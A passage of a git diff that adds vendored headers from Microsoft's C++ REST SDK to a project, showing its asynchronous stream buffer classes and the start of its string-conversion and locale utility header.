(m_currentException == nullptr) m_currentException = eptr; + return close(mode); + } + + /// + /// is_eof is used to determine whether a read head has reached the end of the buffer. + /// + virtual bool is_eof() const { return m_stream_read_eof; } + + /// + /// Writes a single character to the stream. + /// + /// The character to write + /// The value of the character. EOF if the write operation fails + virtual pplx::task putc(_CharType ch) + { + if (!can_write()) return create_exception_checked_value_task(traits::eof()); + + return create_exception_checked_task(_putc(ch), [](int_type) { + return false; // no EOF for write + }); + } + + /// + /// Writes a number of characters to the stream. + /// + /// A pointer to the block of data to be written. + /// The number of characters to write. + /// The number of characters actually written, either 'count' or 0. + CASABLANCA_DEPRECATED("This API in some cases performs a copy. It is deprecated and will be removed in a future " + "release. Use putn_nocopy instead.") + virtual pplx::task putn(const _CharType* ptr, size_t count) + { + if (!can_write()) return create_exception_checked_value_task(0); + if (count == 0) return pplx::task_from_result(0); + + return create_exception_checked_task(_putn(ptr, count, true), [](size_t) { + return false; // no EOF for write + }); + } + + /// + /// Writes a number of characters to the stream. Note: callers must make sure the data to be written is valid until + /// the returned task completes. + /// + /// A pointer to the block of data to be written. + /// The number of characters to write. + /// A task that holds the number of characters actually written, either 'count' or 0. + virtual pplx::task putn_nocopy(const _CharType* ptr, size_t count) + { + if (!can_write()) return create_exception_checked_value_task(0); + if (count == 0) return pplx::task_from_result(0); + + return create_exception_checked_task(_putn(ptr, count), [](size_t) { + return false; // no EOF for write + }); + } + + /// + /// Reads a single character from the stream and advances the read position. + /// + /// The value of the character. EOF if the read fails. + virtual pplx::task bumpc() + { + if (!can_read()) + return create_exception_checked_value_task(streambuf_state_manager<_CharType>::traits::eof()); + + return create_exception_checked_task( + _bumpc(), [](int_type val) { return val == streambuf_state_manager<_CharType>::traits::eof(); }); + } + + /// + /// Reads a single character from the stream and advances the read position. + /// + /// The value of the character. -1 if the read fails. -2 if an asynchronous read is + /// required This is a synchronous operation, but is guaranteed to never block. + virtual int_type sbumpc() + { + if (!(m_currentException == nullptr)) std::rethrow_exception(m_currentException); + if (!can_read()) return traits::eof(); + return check_sync_read_eof(_sbumpc()); + } + + /// + /// Reads a single character from the stream without advancing the read position. + /// + /// The value of the byte. EOF if the read fails. + virtual pplx::task getc() + { + if (!can_read()) return create_exception_checked_value_task(traits::eof()); + + return create_exception_checked_task( + _getc(), [](int_type val) { return val == streambuf_state_manager<_CharType>::traits::eof(); }); + } + + /// + /// Reads a single character from the stream without advancing the read position. + /// + /// The value of the character. EOF if the read fails. if an + /// asynchronous read is required This is a synchronous operation, but is guaranteed to never + /// block. + virtual int_type sgetc() + { + if (!(m_currentException == nullptr)) std::rethrow_exception(m_currentException); + if (!can_read()) return traits::eof(); + return check_sync_read_eof(_sgetc()); + } + + /// + /// Advances the read position, then returns the next character without advancing again. + /// + /// The value of the character. EOF if the read fails. + virtual pplx::task nextc() + { + if (!can_read()) return create_exception_checked_value_task(traits::eof()); + + return create_exception_checked_task( + _nextc(), [](int_type val) { return val == streambuf_state_manager<_CharType>::traits::eof(); }); + } + + /// + /// Retreats the read position, then returns the current character without advancing. + /// + /// The value of the character. EOF if the read fails. if an + /// asynchronous read is required + virtual pplx::task ungetc() + { + if (!can_read()) return create_exception_checked_value_task(traits::eof()); + + return create_exception_checked_task(_ungetc(), [](int_type) { return false; }); + } + + /// + /// Reads up to a given number of characters from the stream. + /// + /// The address of the target memory area. + /// The maximum number of characters to read. + /// The number of characters read. O if the end of the stream is reached. + virtual pplx::task getn(_Out_writes_(count) _CharType* ptr, _In_ size_t count) + { + if (!can_read()) return create_exception_checked_value_task(0); + if (count == 0) return pplx::task_from_result(0); + + return create_exception_checked_task(_getn(ptr, count), [](size_t val) { return val == 0; }); + } + + /// + /// Copies up to a given number of characters from the stream, synchronously. + /// + /// The address of the target memory area. + /// The maximum number of characters to read. + /// The number of characters copied. O if the end of the stream is reached or an asynchronous read is + /// required. This is a synchronous operation, but is guaranteed to never block. + virtual size_t scopy(_Out_writes_(count) _CharType* ptr, _In_ size_t count) + { + if (!(m_currentException == nullptr)) std::rethrow_exception(m_currentException); + if (!can_read()) return 0; + + return _scopy(ptr, count); + } + + /// + /// For output streams, flush any internally buffered data to the underlying medium. + /// + /// true if the flush succeeds, false if not + virtual pplx::task sync() + { + if (!can_write()) + { + if (m_currentException == nullptr) + return pplx::task_from_result(); + else + return pplx::task_from_exception(m_currentException); + } + return create_exception_checked_task(_sync(), [](bool) { return false; }).then([](bool) {}); + } + + /// + /// Retrieves the stream buffer exception_ptr if it has been set. + /// + /// Pointer to the exception, if it has been set; otherwise, nullptr will be returned. + virtual std::exception_ptr exception() const { return m_currentException; } + + /// + /// Allocates a contiguous memory block and returns it. + /// + /// The number of characters to allocate. + /// A pointer to a block to write to, null if the stream buffer implementation does not support + /// alloc/commit. This is intended as an advanced API to be used only when it is important to + /// avoid extra copies. + _CharType* alloc(size_t count) + { + if (m_alloced) + throw std::logic_error( + "The buffer is already allocated, this maybe caused by overlap of stream read or write"); + + _CharType* alloc_result = _alloc(count); + + if (alloc_result) m_alloced = true; + + return alloc_result; + } + + /// + /// Submits a block already allocated by the stream buffer. + /// + /// The number of characters to be committed. + /// This is intended as an advanced API to be used only when it is important to avoid extra + /// copies. + void commit(size_t count) + { + if (!m_alloced) throw std::logic_error("The buffer needs to allocate first"); + + _commit(count); + m_alloced = false; + } + +public: + virtual bool can_seek() const = 0; + virtual bool has_size() const = 0; + virtual utility::size64_t size() const { return 0; } + virtual size_t buffer_size(std::ios_base::openmode direction = std::ios_base::in) const = 0; + virtual void set_buffer_size(size_t size, std::ios_base::openmode direction = std::ios_base::in) = 0; + virtual size_t in_avail() const = 0; + virtual pos_type getpos(std::ios_base::openmode direction) const = 0; + virtual pos_type seekpos(pos_type pos, std::ios_base::openmode direction) = 0; + virtual pos_type seekoff(off_type offset, std::ios_base::seekdir way, std::ios_base::openmode mode) = 0; + virtual bool acquire(_Out_writes_(count) _CharType*& ptr, _In_ size_t& count) = 0; + virtual void release(_Out_writes_(count) _CharType* ptr, _In_ size_t count) = 0; + +protected: + virtual pplx::task _putc(_CharType ch) = 0; + + // This API is only needed for file streams and until we remove the deprecated stream buffer putn overload. + virtual pplx::task _putn(const _CharType* ptr, size_t count, bool) + { + // Default to no copy, only the file streams API overloads and performs a copy. + return _putn(ptr, count); + } + virtual pplx::task _putn(const _CharType* ptr, size_t count) = 0; + + virtual pplx::task _bumpc() = 0; + virtual int_type _sbumpc() = 0; + virtual pplx::task _getc() = 0; + virtual int_type _sgetc() = 0; + virtual pplx::task _nextc() = 0; + virtual pplx::task _ungetc() = 0; + virtual pplx::task _getn(_Out_writes_(count) _CharType* ptr, _In_ size_t count) = 0; + virtual size_t _scopy(_Out_writes_(count) _CharType* ptr, _In_ size_t count) = 0; + virtual pplx::task _sync() = 0; + virtual _CharType* _alloc(size_t count) = 0; + virtual void _commit(size_t count) = 0; + + /// + /// The real read head close operation, implementation should override it if there is any resource to be released. + /// + virtual pplx::task _close_read() + { + m_stream_can_read = false; + return pplx::task_from_result(); + } + + /// + /// The real write head close operation, implementation should override it if there is any resource to be released. + /// + virtual pplx::task _close_write() + { + m_stream_can_write = false; + return pplx::task_from_result(); + } + +protected: + streambuf_state_manager(std::ios_base::openmode mode) + { + m_stream_can_read = (mode & std::ios_base::in) != 0; + m_stream_can_write = (mode & std::ios_base::out) != 0; + m_stream_read_eof = false; + m_alloced = false; + } + + std::exception_ptr m_currentException; + // The in/out mode for the buffer + std::atomic m_stream_can_read; + std::atomic m_stream_can_write; + std::atomic m_stream_read_eof; + std::atomic m_alloced; + +private: + template + pplx::task<_CharType1> create_exception_checked_value_task(const _CharType1& val) const + { + if (this->exception() == nullptr) + return pplx::task_from_result<_CharType1>(static_cast<_CharType1>(val)); + else + return pplx::task_from_exception<_CharType1>(this->exception()); + } + + // Set exception and eof states for async read + template + pplx::task<_CharType1> create_exception_checked_task(pplx::task<_CharType1> result, + std::function eof_test, + std::ios_base::openmode mode = std::ios_base::in | + std::ios_base::out) + { + auto thisPointer = this->shared_from_this(); + + auto func1 = [=](pplx::task<_CharType1> t1) -> pplx::task<_CharType1> { + try + { + thisPointer->m_stream_read_eof = eof_test(t1.get()); + } + catch (...) + { + thisPointer->close(mode, std::current_exception()).get(); + return pplx::task_from_exception<_CharType1>(thisPointer->exception(), pplx::task_options()); + } + if (thisPointer->m_stream_read_eof && !(thisPointer->exception() == nullptr)) + return pplx::task_from_exception<_CharType1>(thisPointer->exception(), pplx::task_options()); + return t1; + }; + + if (result.is_done()) + { + // If the data is already available, we should avoid scheduling a continuation, so we do it inline. + return func1(result); + } + else + { + return result.then(func1); + } + } + + // Set eof states for sync read + int_type check_sync_read_eof(int_type ch) + { + m_stream_read_eof = ch == traits::eof(); + return ch; + } +}; + +} // namespace details + +// Forward declarations +template +class basic_istream; +template +class basic_ostream; + +/// +/// Reference-counted stream buffer. +/// +/// +/// The data type of the basic element of the streambuf. +/// +/// +/// The data type of the basic element of the streambuf. +/// +template +class streambuf : public details::basic_streambuf<_CharType> +{ +public: + typedef typename details::basic_streambuf<_CharType>::traits traits; + typedef typename details::basic_streambuf<_CharType>::int_type int_type; + typedef typename details::basic_streambuf<_CharType>::pos_type pos_type; + typedef typename details::basic_streambuf<_CharType>::off_type off_type; + typedef typename details::basic_streambuf<_CharType>::char_type char_type; + + template + friend class streambuf; + + /// + /// Constructor. + /// + /// A pointer to the concrete stream buffer implementation. + streambuf(_In_ const std::shared_ptr>& ptr) : m_buffer(ptr) {} + + /// + /// Default constructor. + /// + streambuf() {} + + /// + /// Converter Constructor. + /// + /// + /// The data type of the basic element of the source streambuf. + /// + /// The source buffer to be converted. + template + streambuf(const streambuf& other) + : m_buffer(std::static_pointer_cast>( + std::static_pointer_cast(other.m_buffer))) + { + static_assert(std::is_same::pos_type>::value && + std::is_same::off_type>::value && + std::is_integral<_CharType>::value && std::is_integral::value && + std::is_integral::value && + std::is_integral::int_type>::value && + sizeof(_CharType) == sizeof(AlterCharType) && + sizeof(int_type) == sizeof(typename details::basic_streambuf::int_type), + "incompatible stream character types"); + } + + /// + /// Constructs an input stream head for this stream buffer. + /// + /// basic_istream. + concurrency::streams::basic_istream<_CharType> create_istream() const + { + if (!can_read()) throw std::runtime_error("stream buffer not set up for input of data"); + return concurrency::streams::basic_istream<_CharType>(*this); + } + + /// + /// Constructs an output stream for this stream buffer. + /// + /// basic_ostream + concurrency::streams::basic_ostream<_CharType> create_ostream() const + { + if (!can_write()) throw std::runtime_error("stream buffer not set up for output of data"); + return concurrency::streams::basic_ostream<_CharType>(*this); + } + + /// + /// Checks if the stream buffer has been initialized or not. + /// + operator bool() const { return (bool)m_buffer; } + + /// + /// Destructor + /// + virtual ~streambuf() {} + + const std::shared_ptr>& get_base() const + { + if (!m_buffer) + { + throw std::invalid_argument("Invalid streambuf object"); + } + + return m_buffer; + } + + /// + /// can_read is used to determine whether a stream buffer will support read operations (get). + /// + virtual bool can_read() const { return get_base()->can_read(); } + + /// + /// can_write is used to determine whether a stream buffer will support write operations (put). + /// + virtual bool can_write() const { return get_base()->can_write(); } + + /// + /// can_seek is used to determine whether a stream buffer supports seeking. + /// + /// True if seeking is supported, false otherwise. + virtual bool can_seek() const { return get_base()->can_seek(); } + + /// + /// has_size is used to determine whether a stream buffer supports size(). + /// + /// True if the size API is supported, false otherwise. + virtual bool has_size() const { return get_base()->has_size(); } + + /// + /// Gets the total number of characters in the stream buffer, if known. Calls to has_size will determine + /// whether the result of size can be relied on. + /// + /// The total number of characters in the stream buffer. + virtual utility::size64_t size() const { return get_base()->size(); } + + /// + /// Gets the stream buffer size, if one has been set. + /// + /// The direction of buffering (in or out) + /// The size of the internal buffer (for the given direction). + /// An implementation that does not support buffering will always return 0. + virtual size_t buffer_size(std::ios_base::openmode direction = std::ios_base::in) const + { + return get_base()->buffer_size(direction); + } + + /// + /// Sets the stream buffer implementation to buffer or not buffer. + /// + /// The size to use for internal buffering, 0 if no buffering should be done. + /// The direction of buffering (in or out) + /// An implementation that does not support buffering will silently ignore calls to this function and it + /// will not have any effect on what is returned by subsequent calls to . + virtual void set_buffer_size(size_t size, std::ios_base::openmode direction = std::ios_base::in) + { + get_base()->set_buffer_size(size, direction); + } + + /// + /// For any input stream, in_avail returns the number of characters that are immediately available + /// to be consumed without blocking. May be used in conjunction with to read data without + /// incurring the overhead of using tasks. + /// + /// Number of characters that are ready to read. + virtual size_t in_avail() const { return get_base()->in_avail(); } + + /// + /// Checks if the stream buffer is open. + /// + /// No separation is made between open for reading and open for writing. + /// True if the stream buffer is open for reading or writing, false otherwise. + virtual bool is_open() const { return get_base()->is_open(); } + + /// + /// is_eof is used to determine whether a read head has reached the end of the buffer. + /// + /// True if at the end of the buffer, false otherwise. + virtual bool is_eof() const { return get_base()->is_eof(); } + + /// + /// Closes the stream buffer, preventing further read or write operations. + /// + /// The I/O mode (in or out) to close for. + virtual pplx::task close(std::ios_base::openmode mode = (std::ios_base::in | std::ios_base::out)) + { + // We preserve the check here to workaround a Dev10 compiler crash + auto buffer = get_base(); + return buffer ? buffer->close(mode) : pplx::task_from_result(); + } + + /// + /// Closes the stream buffer with an exception. + /// + /// The I/O mode (in or out) to close for. + /// Pointer to the exception. + virtual pplx::task close(std::ios_base::openmode mode, std::exception_ptr eptr) + { + // We preserve the check here to workaround a Dev10 compiler crash + auto buffer = get_base(); + return buffer ? buffer->close(mode, eptr) : pplx::task_from_result(); + } + + /// + /// Writes a single character to the stream. + /// + /// The character to write + /// The value of the character. EOF if the write operation fails + virtual pplx::task putc(_CharType ch) { return get_base()->putc(ch); } + + /// + /// Allocates a contiguous memory block and returns it. + /// + /// The number of characters to allocate. + /// A pointer to a block to write to, null if the stream buffer implementation does not support + /// alloc/commit. + virtual _CharType* alloc(size_t count) { return get_base()->alloc(count); } + + /// + /// Submits a block already allocated by the stream buffer. + /// + /// The number of characters to be committed. + virtual void commit(size_t count) { get_base()->commit(count); } + + /// + /// Gets a pointer to the next already allocated contiguous block of data. + /// + /// A reference to a pointer variable that will hold the address of the block on success. + /// The number of contiguous characters available at the address in 'ptr'. + /// true if the operation succeeded, false otherwise. + /// + /// A return of false does not necessarily indicate that a subsequent read operation would fail, only that + /// there is no block to return immediately or that the stream buffer does not support the operation. + /// The stream buffer may not de-allocate the block until is called. + /// If the end of the stream is reached, the function will return true, a null pointer, and a count of zero; + /// a subsequent read will not succeed. + /// + virtual bool acquire(_Out_ _CharType*& ptr, _Out_ size_t& count) + { + ptr = nullptr; + count = 0; + return get_base()->acquire(ptr, count); + } + + /// + /// Releases a block of data acquired using . This frees the stream buffer to + /// de-allocate the memory, if it so desires. Move the read position ahead by the count. + /// + /// A pointer to the block of data to be released. + /// The number of characters that were read. + virtual void release(_Out_writes_(count) _CharType* ptr, _In_ size_t count) { get_base()->release(ptr, count); } + + /// + /// Writes a number of characters to the stream. + /// + /// A pointer to the block of data to be written. + /// The number of characters to write. + /// The number of characters actually written, either 'count' or 0. + CASABLANCA_DEPRECATED("This API in some cases performs a copy. It is deprecated and will be removed in a future " + "release. Use putn_nocopy instead.") + virtual pplx::task putn(const _CharType* ptr, size_t count) { return get_base()->putn(ptr, count); } + + /// + /// Writes a number of characters to the stream. Note: callers must make sure the data to be written is valid until + /// the returned task completes. + /// + /// A pointer to the block of data to be written. + /// The number of characters to write. + /// The number of characters actually written, either 'count' or 0. + virtual pplx::task putn_nocopy(const _CharType* ptr, size_t count) + { + return get_base()->putn_nocopy(ptr, count); + } + + /// + /// Reads a single character from the stream and advances the read position. + /// + /// The value of the character. EOF if the read fails. + virtual pplx::task bumpc() { return get_base()->bumpc(); } + + /// + /// Reads a single character from the stream and advances the read position. + /// + /// The value of the character. -1 if the read fails. -2 if an asynchronous read is + /// required This is a synchronous operation, but is guaranteed to never block. + virtual typename details::basic_streambuf<_CharType>::int_type sbumpc() { return get_base()->sbumpc(); } + + /// + /// Reads a single character from the stream without advancing the read position. + /// + /// The value of the byte. EOF if the read fails. + virtual pplx::task getc() { return get_base()->getc(); } + + /// + /// Reads a single character from the stream without advancing the read position. + /// + /// The value of the character. EOF if the read fails. if an + /// asynchronous read is required This is a synchronous operation, but is guaranteed to never + /// block. + virtual typename details::basic_streambuf<_CharType>::int_type sgetc() { return get_base()->sgetc(); } + + /// + /// Advances the read position, then returns the next character without advancing again. + /// + /// The value of the character. EOF if the read fails. + pplx::task nextc() { return get_base()->nextc(); } + + /// + /// Retreats the read position, then returns the current character without advancing. + /// + /// The value of the character. EOF if the read fails. if an + /// asynchronous read is required + pplx::task ungetc() { return get_base()->ungetc(); } + + /// + /// Reads up to a given number of characters from the stream. + /// + /// The address of the target memory area. + /// The maximum number of characters to read. + /// The number of characters read. O if the end of the stream is reached. + virtual pplx::task getn(_Out_writes_(count) _CharType* ptr, _In_ size_t count) + { + return get_base()->getn(ptr, count); + } + + /// + /// Copies up to a given number of characters from the stream, synchronously. + /// + /// The address of the target memory area. + /// The maximum number of characters to read. + /// The number of characters copied. O if the end of the stream is reached or an asynchronous read is + /// required. This is a synchronous operation, but is guaranteed to never block. + virtual size_t scopy(_Out_writes_(count) _CharType* ptr, _In_ size_t count) + { + return get_base()->scopy(ptr, count); + } + + /// + /// Gets the current read or write position in the stream. + /// + /// The I/O direction to seek (see remarks) + /// The current position. EOF if the operation fails. + /// Some streams may have separate write and read cursors. + /// For such streams, the direction parameter defines whether to move the read or the write + /// cursor. + virtual typename details::basic_streambuf<_CharType>::pos_type getpos(std::ios_base::openmode direction) const + { + return get_base()->getpos(direction); + } + + /// + /// Seeks to the given position. + /// + /// The offset from the beginning of the stream. + /// The I/O direction to seek (see remarks). + /// The position. EOF if the operation fails. + /// Some streams may have separate write and read cursors. For such streams, the direction parameter + /// defines whether to move the read or the write cursor. + virtual typename details::basic_streambuf<_CharType>::pos_type seekpos( + typename details::basic_streambuf<_CharType>::pos_type pos, std::ios_base::openmode direction) + { + return get_base()->seekpos(pos, direction); + } + + /// + /// Seeks to a position given by a relative offset. + /// + /// The relative position to seek to + /// The starting point (beginning, end, current) for the seek. + /// The I/O direction to seek (see remarks) + /// The position. EOF if the operation fails. + /// Some streams may have separate write and read cursors. + /// For such streams, the mode parameter defines whether to move the read or the write cursor. + virtual typename details::basic_streambuf<_CharType>::pos_type seekoff( + typename details::basic_streambuf<_CharType>::off_type offset, + std::ios_base::seekdir way, + std::ios_base::openmode mode) + { + return get_base()->seekoff(offset, way, mode); + } + + /// + /// For output streams, flush any internally buffered data to the underlying medium. + /// + /// true if the flush succeeds, false if not + virtual pplx::task sync() { return get_base()->sync(); } + + /// + /// Retrieves the stream buffer exception_ptr if it has been set. + /// + /// Pointer to the exception, if it has been set; otherwise, nullptr will be returned + virtual std::exception_ptr exception() const { return get_base()->exception(); } + +private: + std::shared_ptr> m_buffer; +}; + +} // namespace streams +} // namespace Concurrency diff --git a/Src/Common/CppRestSdk/include/cpprest/asyncrt_utils.h b/Src/Common/CppRestSdk/include/cpprest/asyncrt_utils.h new file mode 100644 index 0000000..70649d5 --- /dev/null +++ b/Src/Common/CppRestSdk/include/cpprest/asyncrt_utils.h @@ -0,0 +1,697 @@ +/*** + * Copyright (C) Microsoft. All rights reserved. + * Licensed under the MIT license. See LICENSE.txt file in the project root for full license information. + * + * =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ + * + * Various common utilities. + * + * For the latest on this and related APIs, please see: https://github.com/Microsoft/cpprestsdk + * + * =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + ****/ + +#pragma once + +#include "Common/CppRestSdk/include/cpprest/details/basic_types.h" +#include "Common/CppRestSdk/include/pplx/pplxtasks.h" +#include +#include +#include +#include +#include +#include +#include +#include + +#ifndef _WIN32 +#include +#if !defined(ANDROID) && !defined(__ANDROID__) && defined(HAVE_XLOCALE_H) // CodePlex 269 +/* Systems using glibc: xlocale.h has been removed from glibc 2.26 + The above include of locale.h is sufficient + Further details: https://sourceware.org/git/?p=glibc.git;a=commit;h=f0be25b6336db7492e47d2e8e72eb8af53b5506d */ +#include +#endif +#endif + +/// Various utilities for string conversions and date and time manipulation. +namespace utility +{ +// Left over from VS2010 support, remains to avoid breaking. +typedef std::chrono::seconds seconds; + +/// Functions for converting to/from std::chrono::seconds to xml string. +namespace timespan +{ +/// +/// Converts a timespan/interval in seconds to xml duration string as specified by +/// http://www.w3.org/TR/xmlschema-2/#duration +/// +_ASYNCRTIMP utility::string_t __cdecl seconds_to_xml_duration(utility::seconds numSecs); + +/// +/// Converts an xml duration to timespan/interval in seconds +/// http://www.w3.org/TR/xmlschema-2/#duration +/// +_ASYNCRTIMP utility::seconds __cdecl xml_duration_to_seconds(const utility::string_t& timespanString); +} // namespace timespan + +/// Functions for Unicode string conversions. +namespace conversions +{ +/// +/// Converts a UTF-16 string to a UTF-8 string. +/// +/// A two byte character UTF-16 string. +/// A single byte character UTF-8 string. +_ASYNCRTIMP std::string __cdecl utf16_to_utf8(const utf16string& w); + +/// +/// Converts a UTF-8 string to a UTF-16 +/// +/// A single byte character UTF-8 string. +/// A two byte character UTF-16 string. +_ASYNCRTIMP utf16string __cdecl utf8_to_utf16(const std::string& s); + +/// +/// Converts a ASCII (us-ascii) string to a UTF-16 string. +/// +/// A single byte character us-ascii string. +/// A two byte character UTF-16 string. +_ASYNCRTIMP utf16string __cdecl usascii_to_utf16(const std::string& s); + +/// +/// Converts a Latin1 (iso-8859-1) string to a UTF-16 string. +/// +/// A single byte character UTF-8 string. +/// A two byte character UTF-16 string. +_ASYNCRTIMP utf16string __cdecl latin1_to_utf16(const std::string& s); + +/// +/// Converts a Latin1 (iso-8859-1) string to a UTF-8 string. +/// +/// A single byte character UTF-8 string. +/// A single byte character UTF-8 string. +_ASYNCRTIMP utf8string __cdecl latin1_to_utf8(const std::string& s); + +/// +/// Converts to a platform dependent Unicode string type. +/// +/// A single byte character UTF-8 string. +/// A platform dependent string type. +#ifdef _UTF16_STRINGS +_ASYNCRTIMP utility::string_t __cdecl to_string_t(std::string&& s); +#else +inline utility::string_t&& to_string_t(std::string&& s) { return std::move(s); } +#endif + +/// +/// Converts to a platform dependent Unicode string type. +/// +/// A two byte character UTF-16 string. +/// A platform dependent string type. +#ifdef _UTF16_STRINGS +inline utility::string_t&& to_string_t(utf16string&& s) { return std::move(s); } +#else +_ASYNCRTIMP utility::string_t __cdecl to_string_t(utf16string&& s); +#endif +/// +/// Converts to a platform dependent Unicode string type. +/// +/// A single byte character UTF-8 string. +/// A platform dependent string type. +#ifdef _UTF16_STRINGS +_ASYNCRTIMP utility::string_t __cdecl to_string_t(const std::string& s); +#else +inline const utility::string_t& to_string_t(const std::string& s) { return s; } +#endif + +/// +/// Converts to a platform dependent Unicode string type. +/// +/// A two byte character UTF-16 string. +/// A platform dependent string type. +#ifdef _UTF16_STRINGS +inline const utility::string_t& to_string_t(const utf16string& s) { return s; } +#else +_ASYNCRTIMP utility::string_t __cdecl to_string_t(const utf16string& s); +#endif + +/// +/// Converts to a UTF-16 from string. +/// +/// A single byte character UTF-8 string. +/// A two byte character UTF-16 string. +_ASYNCRTIMP utf16string __cdecl to_utf16string(const std::string& value); + +/// +/// Converts to a UTF-16 from string. +/// +/// A two byte character UTF-16 string. +/// A two byte character UTF-16 string. +inline const utf16string& to_utf16string(const utf16string& value) { return value; } +/// +/// Converts to a UTF-16 from string. +/// +/// A two byte character UTF-16 string. +/// A two byte character UTF-16 string. +inline utf16string&& to_utf16string(utf16string&& value) { return std::move(value); } + +/// +/// Converts to a UTF-8 string. +/// +/// A single byte character UTF-8 string. +/// A single byte character UTF-8 string. +inline std::string&& to_utf8string(std::string&& value) { return std::move(value); } + +/// +/// Converts to a UTF-8 string. +/// +/// A single byte character UTF-8 string. +/// A single byte character UTF-8 string. +inline const std::string& to_utf8string(const std::string& value) { return value; } + +/// +/// Converts to a UTF-8 string. +/// +/// A two byte character UTF-16 string. +/// A single byte character UTF-8 string. +_ASYNCRTIMP std::string __cdecl to_utf8string(const utf16string& value); + +/// +/// Encode the given byte array into a base64 string +/// +_ASYNCRTIMP utility::string_t __cdecl to_base64(const std::vector& data); + +/// +/// Encode the given 8-byte integer into a base64 string +/// +_ASYNCRTIMP utility::string_t __cdecl to_base64(uint64_t data); + +/// +/// Decode the given base64 string to a byte array +/// +_ASYNCRTIMP std::vector __cdecl from_base64(const utility::string_t& str); + +template +CASABLANCA_DEPRECATED("All locale-sensitive APIs will be removed in a future update. Use stringstreams directly if " + "locale support is required.") +utility::string_t print_string(const Source& val, const std::locale& loc = std::locale()) +{ + utility::ostringstream_t oss; + oss.imbue(loc); + oss << val; + if (oss.bad()) + { + throw std::bad_cast(); + } + return oss.str(); +} + +CASABLANCA_DEPRECATED("All locale-sensitive APIs will be removed in a future update. Use stringstreams directly if " + "locale support is required.") +inline utility::string_t print_string(const utility::string_t& val) { return val; } + +namespace details +{ +#if defined(__ANDROID__) +template +inline std::string to_string(const T t) +{ + std::ostringstream os; + os.imbue(std::locale::classic()); + os << t; + return os.str(); +} +#endif + +template +inline utility::string_t to_string_t(const T t) +{ +#ifdef _UTF16_STRINGS + using std::to_wstring; + return to_wstring(t); +#else +#if !defined(__ANDROID__) + using std::to_string; +#endif + return to_string(t); +#endif +} + +template +utility::string_t print_string(const Source& val) +{ + utility::ostringstream_t oss; + oss.imbue(std::locale::classic()); + oss << val; + if (oss.bad()) + { + throw std::bad_cast(); + } + return oss.str(); +} + +inline const utility::string_t& print_string(const utility::string_t& val) { return val; } + +template +utf8string print_utf8string(const Source& val) +{ + return conversions::to_utf8string(print_string(val)); +} +inline const utf8string& print_utf8string(const utf8string& val) { return val; } + +template +Target scan_string(const utility::string_t& str) +{ + Target t; + utility::istringstream_t iss(str); + iss.imbue(std::locale::classic()); + iss >> t; + if (iss.bad()) + { + throw std::bad_cast(); + } + return t; +} + +inline const utility::string_t& scan_string(const utility::string_t& str) { return str; } +} // namespace details + +template +CASABLANCA_DEPRECATED("All locale-sensitive APIs will be removed in a future update. Use stringstreams directly if " + "locale support is required.") +Target scan_string(const utility::string_t& str, const std::locale& loc = std::locale()) +{ + Target t; + utility::istringstream_t iss(str); + iss.imbue(loc); + iss >> t; + if (iss.bad()) + { + throw std::bad_cast(); + } + return t; +} + +CASABLANCA_DEPRECATED("All locale-sensitive APIs will be removed in a future update. Use stringstreams directly if " + "locale support is required.") +inline utility::string_t scan_string(const utility::string_t& str) { return str; } +} // namespace conversions + +namespace details +{ +/// +/// Cross platform RAII container for setting thread local locale. +/// +class scoped_c_thread_locale +{ +public: + _ASYNCRTIMP scoped_c_thread_locale(); + _ASYNCRTIMP ~scoped_c_thread_locale(); + +#if !defined(ANDROID) && !defined(__ANDROID__) // CodePlex 269 +#ifdef _WIN32 + typedef _locale_t xplat_locale; +#else + typedef locale_t xplat_locale; +#endif + + static _ASYNCRTIMP xplat_locale __cdecl c_locale(); +#endif +private: +#ifdef _WIN32 + std::string m_prevLocale; + int m_prevThreadSetting; +#elif !(defined(ANDROID) || defined(__ANDROID__)) + locale_t m_prevLocale; +#endif + scoped_c_thread_locale(const scoped_c_thread_locale&); + scoped_c_thread_locale& operator=(const scoped_c_thread_locale&); +}; + +/// +/// Our own implementation of alpha numeric instead of std::isalnum to avoid +/// taking global lock for performance reasons. +/// +inline bool __cdecl is_alnum(const unsigned char uch) CPPREST_NOEXCEPT +{ // test if uch is an alnum character + // special casing char to avoid branches + // clang-format off + static CPPREST_CONSTEXPR bool is_alnum_table[UCHAR_MAX + 1] = { + /* X0 X1 X2 X3 X4 X5 X6 X7 X8 X9 XA XB XC XD XE XF */ + /* 0X */ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + /* 1X */ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + /* 2X */ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + /* 3X */ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, /* 0-9 */ + /* 4X */ 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, /* A-Z */ + /* 5X */ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, + /* 6X */ 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, /* a-z */ + /* 7X */ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0 + /* non-ASCII values initialized to 0 */ + }; + // clang-format on + return (is_alnum_table[uch]); +} + +/// +/// Our own implementation of alpha numeric instead of std::isalnum to avoid +/// taking global lock for performance reasons. +/// +inline bool __cdecl is_alnum(const char ch) CPPREST_NOEXCEPT { return (is_alnum(static_cast(ch))); } + +/// +/// Our own implementation of alpha numeric instead of std::isalnum to avoid +/// taking global lock for performance reasons. +/// +template +inline bool __cdecl is_alnum(Elem ch) CPPREST_NOEXCEPT +{ + // assumes 'x' == L'x' for the ASCII range + typedef typename std::make_unsigned::type UElem; + const auto uch = static_cast(ch); + return (uch <= static_cast('z') && is_alnum(static_cast(uch))); +} + +/// +/// Simplistic implementation of make_unique. A better implementation would be based on variadic templates +/// and therefore not be compatible with Dev10. +/// +template +std::unique_ptr<_Type> make_unique() +{ + return std::unique_ptr<_Type>(new _Type()); +} + +template +std::unique_ptr<_Type> make_unique(_Arg1&& arg1) +{ + return std::unique_ptr<_Type>(new 